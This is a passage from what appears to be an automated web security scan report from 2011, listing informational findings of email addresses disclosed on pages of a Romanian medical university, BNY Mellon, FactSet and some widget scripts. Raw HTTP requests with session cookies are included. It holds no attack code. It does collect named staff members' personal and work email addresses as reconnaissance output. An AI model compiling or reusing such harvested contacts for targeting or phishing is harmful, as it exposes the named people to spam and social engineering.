The following email addresses were disclosed in the response:

Request

GET /lista.aspx?t=Masterat-Prezentare HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/en
Cookie: __utma=234819994.717153536.1311096678.1311096678.1311097986.2; __utmb=234819994.1.10.1311097986; __utmz=234819994.1311097986.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; ASP.NET_SessionId=1olglu55bypnb2zmxxbaxl55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:57:28 GMT
Content-Length: 62710


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<br />
Vice-Chancellor: PhD Prof. Sorin Dudea, e-mail: sdudea@umfcluj.ro<br />
Secretary: Aurora Laszlo, e-mail: alaszlo@umfcluj.ro<br />
...[SNIP]...

23.29. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /lista.aspx?t=International-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:46:00 GMT
Content-Length: 64369


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<br />
e-mail: dri@umfcluj.ro<br />
...[SNIP]...

23.30. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /lista.aspx?t=Biblioteca-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:19 GMT
Content-Length: 66728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<a href="javascript:location.href='mailto:'+String.fromCharCode(98,105,98,108,105,111,116,101,99,97,117,109,102,64,117,109,102,99,108,117,106,46,114,111)+'?'">bibliotecaumf@umfcluj.ro </a>
...[SNIP]...

23.31. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lista.aspx?t=Revista-Clujul-Medical HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:21 GMT
Content-Length: 62576


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<br />
Mihaela B..ciu.. (mbaciut@yahoo.com), <br />
Cristian B&acirc;rsu (cristianbarsu@yahoo.com), <br />
Simona Clichici (sclichici@umfcluj.ro), <br />
Hora..iu Colo..i (hcolosi@umfcluj.ro), <br />
Ofelia Cri..an (ofelia.crisan@umfcluj.ro), <br />
Daniela Fodor (dfodor@umfcluj.ro)<br />
...[SNIP]...

23.32. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /lista.aspx?t=Medicina-dentara-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.8.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:21 GMT
Content-Length: 82704


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
<br />
Email : decanat_stoma@umfcluj.ro<br />
...[SNIP]...

23.33. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lista.aspx?t=Studii-posuniversitare-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.5.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:16 GMT
Content-Length: 81034


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
<br />
Telefon catedr..: 0264-596291, e-mail: gbaciut@umfcluj.ro<br />
...[SNIP]...
<br />
E-mail: mihaela_rusu@umfcluj.ro<br />
...[SNIP]...
<br />
E-mail: prorectoratpostuniversitar@umfcluj.ro<br />
...[SNIP]...

23.34. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /lista.aspx?t=Medicina-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.6.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:19 GMT
Content-Length: 90484


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
<br />
e-mail: decanat_mg@umfcluj.ro<br />
...[SNIP]...

23.35. http://w.sharethis.com/button/buttons.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 20:30:13 GMT
Cache-Control: public
Content-Length: 48247
Date: Tue, 19 Jul 2011 14:26:36 GMT
Connection: close
Vary: Accept-Encoding

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
turn false}stLight.processSTQ();stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.log("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b="share4x";if(switchTo5x){b="share5x"}if(stLight.hasButtonOnPage()){if(stLight.loadedFromBar){if(switchTo5x){b="bar_share5x"}else{b="bar_share4x"}}}else{if(stLight.loadedFromBar){b=
...[SNIP]...

23.36. http://widgets.outbrain.com/outbrainWidget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.outbrain.com
Path:   /outbrainWidget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /outbrainWidget.js HTTP/1.1
Host: widgets.outbrain.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: obuid=34e83892-8848-4a54-a4d4-8bdbba750320; _lvs2="1tAU7QKQIVo="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:11 GMT
Server: Apache
Last-Modified: Mon, 18 Jul 2011 06:55:11 GMT
ETag: "100a9f-23523-4a8527afc91c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 144675
Content-Type: application/x-javascript
Cache-Control: private, max-age=604800
Age: 0
Expires: Tue, 26 Jul 2011 20:44:11 GMT
Connection: Keep-Alive

window.OB_releaseVer="40506";var ObStartTime=typeof ObStartTime!="undefined"?ObStartTime:(new Date).getTime(),outbrain_browsers=typeof outbrain_browsers=="object"?outbrain_browsers:new (function(){thi
...[SNIP]...
<a href='mailto:feedback@outbrain.com'>feedback@outbrain.com</a>
...[SNIP]...

23.37. http://widgets.twimg.com/j/2/widget-2.2.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget-2.2.css

Issue detail

The following email address was disclosed in the response:

Request

GET /j/2/widget-2.2.css HTTP/1.1
Host: widgets.twimg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links

Response

HTTP/1.0 200 OK
x-amz-id-2: Oc8sZgrPzG1Ge91qs+bSk2Jp3r2zfR+KY6uUoVnXknsTvYtt49MXb8XnQcLOFXDr
x-amz-request-id: 406E8208EC0284F9
Date: Wed, 01 Jun 2011 17:11:16 GMT
Expires: Sat, 27 Feb 2021 01:15:01 GMT+00:00
Last-Modified: Wed, 02 Mar 2011 01:15:11 GMT
ETag: "dafcd64c6e60c0cd55c5215a9899fc6d"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3574
Server: AmazonS3
Age: 4159986
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 7ae63c28b259b42f9220b179df00e9a04efa2389f527fe139f7e4797038bc9c2d9ea1be0b1cc4663
Via: 1.0 9ea7052caff424a8349b197d9240c64b.cloudfront.net:11180 (CloudFront), 1.0 26c110707e0d37c20949c3dad8cf524f.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://www.twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.2 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
*/
.twtr-widget{position:relative;font-size:12px!important;font-family:"lucida grande",lucida,tahoma,helvetica,ar
...[SNIP]...

23.38. http://www.bnymellon.com/foresight/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bnymellon.com
Path:   /foresight/index.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /foresight/index.html HTTP/1.1
Host: www.bnymellon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; WT_FPC=id=173.193.214.243-1841440192.30164523:lv=1311090569909:ss=1311090569909

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:49:27 GMT
Content-type: text/html
Connection: close

<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns ="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:foresight@bnymellon.com" class="noline">ForeSight@bnymellon.com</a>
...[SNIP]...

23.39. http://www.bnymellon.com/foresight/richardhoey.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bnymellon.com
Path:   /foresight/richardhoey.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /foresight/richardhoey.html HTTP/1.1
Host: www.bnymellon.com
Proxy-Connection: keep-alive
Referer: http://www.bnymellon.com/foresight/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; cookies=true; bnymcountry=0%21usen; WT_FPC=id=173.193.214.243-1841440192.30164523:lv=1311090588078:ss=1311090569909

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:49:52 GMT
Content-type: text/html
Connection: close

<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns ="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:foresight@bnymellon.com" class="noline">ForeSight@bnymellon.com</a>
...[SNIP]...

23.40. http://www.bnymellon.com/wealthmanagement/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bnymellon.com
Path:   /wealthmanagement/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /wealthmanagement/index.html HTTP/1.1
Host: www.bnymellon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; bnymcountry=0%21usen; WT_FPC=id=173.193.214.243-1841440192.30164523:lv=1311090580076:ss=1311090569909

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:49:35 GMT
Content-type: text/html
Connection: close

<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns ="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="/util/tosecure.cfm?Dest=/contact/index.cfm?id=wm">wealthmanagement@bnymellon.com<\/a>
...[SNIP]...
<a href="/util/tosecure.cfm?Dest=/contact/index.cfm?id=wm">wealthmanagement@bnymellon.com<\/a>
...[SNIP]...
<a href="/util/tosecure.cfm?Dest=/contact/index.cfm">wealthmanagement@bnymellon.com</a>
...[SNIP]...

23.41. http://www.factset.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:23 GMT
Content-Length: 66655
Content-Language: en
Expires: Sat, 21 Jul 2001 14:13:03 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Tue, 28 Jun 2011 18:55:42 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Age: 800
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.42. http://www.factset.com/events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /events

Issue detail

The following email address was disclosed in the response:

Request

GET /events HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/privateequity
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"; __switchTo5x=61; __unam=301c176-13142cac1d6-364e5fca-2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:29:26 GMT
Content-Length: 76544
Content-Language: en
Expires: Sat, 21 Jul 2001 14:29:25 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Thu, 16 Jun 2011 15:28:57 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.43. http://www.factset.com/files/jquery/nifty/niftycube.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
